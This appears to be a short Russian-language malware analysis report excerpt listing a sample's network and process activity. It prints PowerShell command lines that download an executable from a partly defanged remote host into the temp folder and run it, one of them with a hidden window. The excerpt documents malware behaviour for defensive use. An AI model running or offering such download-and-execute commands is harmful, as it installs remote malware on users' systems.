Техническая информация
- http://va##lla.ml/080110032 как %temp%\qg41.exe
- DNS ASK va##lla.ml
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://va##lla.ml/080110032','%temp%\qg41.exe'); Start '%temp%\qg41.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://va##lla.ml/080110032','%temp%\qg41.exe'); Start '%temp%\qg41.exe'